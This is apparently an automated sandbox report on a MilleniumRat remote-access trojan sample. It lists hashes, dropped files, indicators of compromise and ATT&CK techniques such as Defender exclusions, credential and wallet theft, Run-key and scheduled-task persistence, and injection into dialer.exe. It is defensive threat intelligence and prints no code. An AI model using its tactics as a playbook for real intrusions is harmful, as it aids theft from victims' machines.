milleniumrat | aa5f1188b6ee04b295860df6da0ee047395bd566508aa570249a07919cdf0db8

Analysis

max time kernel
89s
max time network
161s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
12-06-2024 06:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

main.exe
Size

37.2MB
MD5

31125c6581ea8f49e9e42c6d9d6b8240
SHA1

a18eb575c3a1b8fa27de21603008c4e204eecd81
SHA256

aa5f1188b6ee04b295860df6da0ee047395bd566508aa570249a07919cdf0db8
SHA512

9a4c84d6ad4c547f614df3521e2fb0f4ad2b5c885b31aa0cd14d43abb48ef3f8c935e3b498c26e5f6a4262d6d37e867f5a4a3f41e32aa09477b61e64fb80ea75
SSDEEP

786432:8RQBrRSY+R46huYqwAO4YoMGD6Oafw2827HokWhSnuvluwhNnlxM:8ROrRR+R4WurwAO49QY2LtW0nuDhNnnM

Score

10^/10

milleniumrat discovery evasion execution persistence pyinstaller rat spyware stealer upx

Malware Config

Signatures

MilleniumRat
MilleniumRat is a remote access trojan written in C#.
rat stealer milleniumrat

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

setup.exeupdater.exe

description	pid	process	target process
PID 6104 created 3336	6104	setup.exe	Explorer.EXE
PID 6104 created 3336	6104	setup.exe	Explorer.EXE
PID 6104 created 3336	6104	setup.exe	Explorer.EXE
PID 6104 created 3336	6104	setup.exe	Explorer.EXE
PID 6104 created 3336	6104	setup.exe	Explorer.EXE
PID 6104 created 3336	6104	setup.exe	Explorer.EXE
PID 3760 created 3336	3760	updater.exe	Explorer.EXE
PID 3760 created 3336	3760	updater.exe	Explorer.EXE
PID 3760 created 3336	3760	updater.exe	Explorer.EXE
PID 3760 created 3336	3760	updater.exe	Explorer.EXE
PID 3760 created 3336	3760	updater.exe	Explorer.EXE
PID 3760 created 3336	3760	updater.exe	Explorer.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1800 powershell.exe
260 powershell.exe
5384 powershell.exe
6616 powershell.exe
5616 powershell.exe
Contacts a large (1015) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
1800	powershell.exe
260	powershell.exe
5384	powershell.exe
6616	powershell.exe
5616	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

s.exemain.exeUpdate.exeBuild.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	s.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	main.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Update.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Build.exe

Executes dropped EXE 13 IoCs

Processes:

Build.exehacn.exebased.exebased.exehacn.exes.exemain.exesvchost.exesvchost.exesetup.exeUpdate.exerar.exeupdater.exe

pid	process
4704	Build.exe
3996	hacn.exe
2264	based.exe
4932	based.exe
568	hacn.exe
4244	s.exe
4548	main.exe
3464	svchost.exe
5208	svchost.exe
6104	setup.exe
7632	Update.exe
3700	rar.exe
3760	updater.exe

Loads dropped DLL 50 IoCs

Processes:

main.exebased.exehacn.exemain.exesvchost.exeUpdate.exe

pid	process
4824	main.exe
4824	main.exe
4824	main.exe
4932	based.exe
4932	based.exe
4932	based.exe
568	hacn.exe
568	hacn.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4932	based.exe
4548	main.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
5208	svchost.exe
7632	Update.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 51 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI50762\python311.dll	upx
behavioral2/memory/4824-56-0x00007FFA36A70000-0x00007FFA3705A000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50762\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50762\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50762\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI50762\libcrypto-1_1.dll	upx
behavioral2/memory/4932-202-0x00007FFA36390000-0x00007FFA3697A000-memory.dmp	upx
behavioral2/memory/4932-207-0x00007FFA4ABE0000-0x00007FFA4ABEF000-memory.dmp	upx
behavioral2/memory/4932-206-0x00007FFA45E50000-0x00007FFA45E73000-memory.dmp	upx
behavioral2/memory/4932-212-0x00007FFA45B10000-0x00007FFA45B3D000-memory.dmp	upx
behavioral2/memory/4932-213-0x00007FFA45E80000-0x00007FFA45E99000-memory.dmp	upx
behavioral2/memory/4932-214-0x00007FFA45840000-0x00007FFA45863000-memory.dmp	upx
behavioral2/memory/4932-215-0x00007FFA36EF0000-0x00007FFA3705F000-memory.dmp	upx
behavioral2/memory/4932-216-0x00007FFA45C50000-0x00007FFA45C69000-memory.dmp	upx
behavioral2/memory/4932-217-0x00007FFA4ABD0000-0x00007FFA4ABDD000-memory.dmp	upx
behavioral2/memory/4932-220-0x00007FFA3DD80000-0x00007FFA3DDAE000-memory.dmp	upx
behavioral2/memory/4932-221-0x00007FFA36010000-0x00007FFA36385000-memory.dmp	upx
behavioral2/memory/4932-227-0x00007FFA35F50000-0x00007FFA36008000-memory.dmp	upx
behavioral2/memory/4932-226-0x00007FFA36390000-0x00007FFA3697A000-memory.dmp	upx
behavioral2/memory/4932-228-0x00007FFA45E50000-0x00007FFA45E73000-memory.dmp	upx
behavioral2/memory/4932-229-0x00007FFA45B70000-0x00007FFA45B84000-memory.dmp	upx
behavioral2/memory/4932-230-0x00007FFA46780000-0x00007FFA4678D000-memory.dmp	upx
behavioral2/memory/4932-233-0x00007FFA35840000-0x00007FFA3595C000-memory.dmp	upx
behavioral2/memory/4932-420-0x00007FFA35F50000-0x00007FFA36008000-memory.dmp	upx
behavioral2/memory/4932-418-0x00007FFA3DD80000-0x00007FFA3DDAE000-memory.dmp	upx
behavioral2/memory/4932-409-0x00007FFA36390000-0x00007FFA3697A000-memory.dmp	upx
behavioral2/memory/4932-424-0x00007FFA45840000-0x00007FFA45863000-memory.dmp	upx
behavioral2/memory/4932-419-0x00007FFA36010000-0x00007FFA36385000-memory.dmp	upx
behavioral2/memory/4932-423-0x00007FFA35840000-0x00007FFA3595C000-memory.dmp	upx
behavioral2/memory/4932-415-0x00007FFA36EF0000-0x00007FFA3705F000-memory.dmp	upx
behavioral2/memory/4932-416-0x00007FFA45C50000-0x00007FFA45C69000-memory.dmp	upx
behavioral2/memory/4932-410-0x00007FFA45E50000-0x00007FFA45E73000-memory.dmp	upx
behavioral2/memory/4932-2866-0x00007FFA45B10000-0x00007FFA45B3D000-memory.dmp	upx
behavioral2/memory/4932-2869-0x00007FFA45E80000-0x00007FFA45E99000-memory.dmp	upx
behavioral2/memory/4932-2865-0x00007FFA4ABE0000-0x00007FFA4ABEF000-memory.dmp	upx
behavioral2/memory/4932-2864-0x00007FFA45E50000-0x00007FFA45E73000-memory.dmp	upx
behavioral2/memory/4932-2863-0x00007FFA35F50000-0x00007FFA36008000-memory.dmp	upx
behavioral2/memory/4932-2872-0x00007FFA45840000-0x00007FFA45863000-memory.dmp	upx
behavioral2/memory/4932-2874-0x00007FFA45C50000-0x00007FFA45C69000-memory.dmp	upx
behavioral2/memory/4932-2877-0x00007FFA36010000-0x00007FFA36385000-memory.dmp	upx
behavioral2/memory/4932-2876-0x00007FFA3DD80000-0x00007FFA3DDAE000-memory.dmp	upx
behavioral2/memory/4932-2875-0x00007FFA4ABD0000-0x00007FFA4ABDD000-memory.dmp	upx
behavioral2/memory/4932-2873-0x00007FFA36EF0000-0x00007FFA3705F000-memory.dmp	upx
behavioral2/memory/4932-2885-0x00007FFA35840000-0x00007FFA3595C000-memory.dmp	upx
behavioral2/memory/4932-2884-0x00007FFA46780000-0x00007FFA4678D000-memory.dmp	upx
behavioral2/memory/4932-2883-0x00007FFA45B70000-0x00007FFA45B84000-memory.dmp	upx
behavioral2/memory/4932-2882-0x00007FFA36390000-0x00007FFA3697A000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

svchost.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\кокершмидт = "C:\\ProgramData\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

203 discord.com
204 discord.com
43 raw.githubusercontent.com
45 raw.githubusercontent.com
54 raw.githubusercontent.com
134 raw.githubusercontent.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

28 ip-api.com
52 api.ipify.org
53 api.ipify.org

flow	ioc
203	discord.com
204	discord.com
43	raw.githubusercontent.com
45	raw.githubusercontent.com
54	raw.githubusercontent.com
134	raw.githubusercontent.com

flow	ioc
28	ip-api.com
52	api.ipify.org
53	api.ipify.org

Drops file in System32 directory 10 IoCs

Processes:

svchost.exesvchost.exepowershell.exeOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

svchost.exe

pid process

5208 svchost.exe

pid	process
5208	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

setup.exeupdater.exe

description	pid	process	target process
PID 6104 set thread context of 1604	6104	setup.exe	dialer.exe
PID 3760 set thread context of 5792	3760	updater.exe	dialer.exe
PID 3760 set thread context of 4048	3760	updater.exe	dialer.exe
PID 3760 set thread context of 8120	3760	updater.exe	dialer.exe

Drops file in Program Files directory 1 IoCs

Processes:

setup.exe

description ioc process

File created C:\Program Files\Google\Chrome\updater.exe setup.exe
Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

7540 sc.exe
3996 sc.exe
7188 sc.exe
208 sc.exe
456 sc.exe
2160 sc.exe
6064 sc.exe
7268 sc.exe
6920 sc.exe
1868 sc.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

pid	process
7540	sc.exe
3996	sc.exe
7188	sc.exe
208	sc.exe
456	sc.exe
2160	sc.exe
6064	sc.exe
7268	sc.exe
6920	sc.exe
1868	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\ProgramData\Microsoft\hacn.exe	pyinstaller
C:\ProgramData\svchost.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exeUpdate.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Update.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Update.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6856 schtasks.exe
7328 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

7800 timeout.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

6500 WMIC.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

5184 tasklist.exe
5600 tasklist.exe
7472 tasklist.exe
5284 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

5732 systeminfo.exe
Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

6312 taskkill.exe
6416 taskkill.exe
6648 taskkill.exe
6780 taskkill.exe
6880 taskkill.exe
6076 taskkill.exe
7092 taskkill.exe

pid	process
6856	schtasks.exe
7328	schtasks.exe

pid	process
7800	timeout.exe

pid	process
6500	WMIC.exe

pid	process
5184	tasklist.exe
5600	tasklist.exe
7472	tasklist.exe
5284	tasklist.exe

pid	process
5732	systeminfo.exe

pid	process
6312	taskkill.exe
6416	taskkill.exe
6648	taskkill.exe
6780	taskkill.exe
6880	taskkill.exe
6076	taskkill.exe
7092	taskkill.exe

Modifies data under HKEY_USERS 60 IoCs

Processes:

OfficeClickToRun.exepowershell.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={2D91B293-3CCF-4F1C-8471-7C9DB36D76A1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718174362"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 12 Jun 2024 06:39:27 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4244 reg.exe

pid	process
4244	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exemain.exepowershell.exepowershell.exeUpdate.exe

pid	process
260	powershell.exe
260	powershell.exe
1800	powershell.exe
1800	powershell.exe
644	powershell.exe
644	powershell.exe
260	powershell.exe
260	powershell.exe
1800	powershell.exe
1800	powershell.exe
644	powershell.exe
644	powershell.exe
5608	powershell.exe
5608	powershell.exe
5608	powershell.exe
5616	powershell.exe
5616	powershell.exe
5616	powershell.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
4548	main.exe
7192	powershell.exe
7192	powershell.exe
7192	powershell.exe
7344	powershell.exe
7344	powershell.exe
7344	powershell.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe
7632	Update.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

672

pid	process
672

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exemain.exeWMIC.exetasklist.exetasklist.exetasklist.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exetasklist.exeUpdate.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	260	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	644	powershell.exe
Token: SeDebugPrivilege	4548	main.exe
Token: SeIncreaseQuotaPrivilege	5168	WMIC.exe
Token: SeSecurityPrivilege	5168	WMIC.exe
Token: SeTakeOwnershipPrivilege	5168	WMIC.exe
Token: SeLoadDriverPrivilege	5168	WMIC.exe
Token: SeSystemProfilePrivilege	5168	WMIC.exe
Token: SeSystemtimePrivilege	5168	WMIC.exe
Token: SeProfSingleProcessPrivilege	5168	WMIC.exe
Token: SeIncBasePriorityPrivilege	5168	WMIC.exe
Token: SeCreatePagefilePrivilege	5168	WMIC.exe
Token: SeBackupPrivilege	5168	WMIC.exe
Token: SeRestorePrivilege	5168	WMIC.exe
Token: SeShutdownPrivilege	5168	WMIC.exe
Token: SeDebugPrivilege	5168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5168	WMIC.exe
Token: SeRemoteShutdownPrivilege	5168	WMIC.exe
Token: SeUndockPrivilege	5168	WMIC.exe
Token: SeManageVolumePrivilege	5168	WMIC.exe
Token: 33	5168	WMIC.exe
Token: 34	5168	WMIC.exe
Token: 35	5168	WMIC.exe
Token: 36	5168	WMIC.exe
Token: SeDebugPrivilege	5284	tasklist.exe
Token: SeDebugPrivilege	5184	tasklist.exe
Token: SeDebugPrivilege	5600	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5168	WMIC.exe
Token: SeSecurityPrivilege	5168	WMIC.exe
Token: SeTakeOwnershipPrivilege	5168	WMIC.exe
Token: SeLoadDriverPrivilege	5168	WMIC.exe
Token: SeSystemProfilePrivilege	5168	WMIC.exe
Token: SeSystemtimePrivilege	5168	WMIC.exe
